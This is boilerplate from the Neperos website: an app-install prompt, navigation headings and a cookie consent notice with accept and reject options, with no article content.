download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT